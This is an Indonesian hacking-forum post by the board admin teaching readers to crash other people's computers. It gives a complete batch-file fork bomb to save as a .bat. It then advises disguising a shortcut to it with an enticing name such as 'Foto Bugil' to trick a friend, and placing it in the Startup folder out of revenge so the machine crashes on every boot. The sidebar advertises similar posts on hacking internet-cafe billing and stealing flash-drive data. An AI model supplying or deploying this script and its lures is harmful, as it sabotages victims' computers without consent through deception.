Tukeran Link !!!
Latest topics
» Mobile chat avacs
Sun Apr 03, 2011 2:27 am by not

» Cara Menghack Billing Explorer Warnet
Thu Apr 22, 2010 1:11 am by admin

» Cara bikin Hang/heng/hank/henk Komputer !!!
Wed Apr 07, 2010 6:37 pm by admin

» thumbSUCK Aplikasi Pencuri data dari Flashdisk Orang lain
Wed Apr 07, 2010 6:35 pm by admin

» Tutorial Belajar MS.PowerPoint
Wed Apr 07, 2010 6:18 pm by admin

» Tutorial Merakit Komputer
Wed Apr 07, 2010 6:16 pm by admin

» Know How Programming !!!
Wed Apr 07, 2010 6:12 pm by admin

» Cara Mengacaukan Kursor Mouse
Wed Apr 07, 2010 6:10 pm by admin

» Black Screen Windows
Wed Apr 07, 2010 6:08 pm by admin

Navigation
 Portal
 Indeks
 Anggota
 Profil
 FAQ
 Pencarian
User Yang Sedang Online
Total 1 user online :: 0 Terdaftar, 0 Tersembunyi dan 1 Tamu

Tidak ada

[ View the whole list ]


User online terbanyak adalah 9 pada Fri Jul 08, 2011 2:33 am
Kotak Komentar
Google Translate
English French German Spain Italian Dutch

Russian Portuguese Japanese Korean Arabic
RSS feeds


Yahoo! 
MSN 
AOL 
Netvibes 
Bloglines 


Affiliates
free forum


Cara bikin Hang/heng/hank/henk Komputer !!!

Topik sebelumnya Topik selanjutnya Go down

Cara bikin Hang/heng/hank/henk Komputer !!!

Post  admin on Wed Apr 07, 2010 6:37 pm

Nah sekarang kita belajar berbuat jail Very Happy, sesuai dengan judul di atas yaitu membuat hang komputer. Tau gag hang!? He he he klo ada yang blom tau hang tu kondisi dimana komputer tidak merespon atau bengong tanpa bisa diapa-apain, Very Happy penjelasan yang sangat sederhana kan, namanya juga orang Gap-Tech yaaa cuma begitu deh bisanya.
Ehem gimana kita membuat komputer hang/crash? Ya kita penuhin aja dengan banyaknya program yang dijalankan, lama-lama juga RAM dah ngga nampung trus hang/crash deh Very Happy. Pertama-tama buka Notepad dari start menu, dan ketikkan/ copy-pastekan script di bawah ini!

:s
start %0
goto :s

Klo dah pilih File > Save As > Pilih All Files > Simpan dengan nama bmbCrash.bat, sebenernya simpan dengan nama apa aja si juga boleh asal ujungnya .bat aja Smile.

---------------------------------
Tips setan ✌
---------------------------------

* Klo mo isengin temen tapi cuma sekali bikin Shortcut di desktop ganti iconnya dan rename shortcutnya dengan nama "Seru Lho" atau nama-nama lain yang menarik misalx lagi deh "Foto Bugil" Very Happy.
** Nah ini klo dendam sama temen ada cara satu lagi yang bikin bingung (klo ngga tw Very Happy). Sama bikin shortcut juga tapi di taronya di Start Menu> All Programs> Startup taronya di drag aja shortcutnya sampai ketujuan. Maksudnya biar script yang tadi kita tulis akan ikut startup komputer, efeknya pas komputer dinyalakan script langsung aktif dan membuat komputer hang/crash.
Begitu terus sampai... hmmm ngga tau juga sampai kapan!!! Very Happy

>>> Cara Mengatasi

- Langsung Restart PC anda dan Nyalakan Ulang maka komputer akan kembali NORMAL !!!

Hal ini ( selain Me-Restart PC scr paksa ) Blm q temukan sampai skrng !!!
bagi yang tau beri tau kami yach ??? atau PM aja Admin .... Very Happy


xixixixi ... trik ini gw dapetin bwt iseng diLab.., pas lagi bengong tau-tau "Ting!!!" :t eh malah ide jahat yang keluar :v
Tapi Jangan Lupa Bahan ini kami sajikan JUST FOR LEARNING ... okz Ngerti khan !!!


Twisted Evil Twisted Evil Twisted Evil Twisted Evil Razz Razz
avatar
admin
Admin

Jumlah posting : 17
Join date : 31.03.10
Age : 24
Lokasi : Gorontalo

Lihat profil user http://ezero.forum.st & www.kurniawan93.tk

Kembali Ke Atas Go down

Topik sebelumnya Topik selanjutnya Kembali Ke Atas

- Similar topics

 
Permissions in this forum:
Anda tidak dapat menjawab topik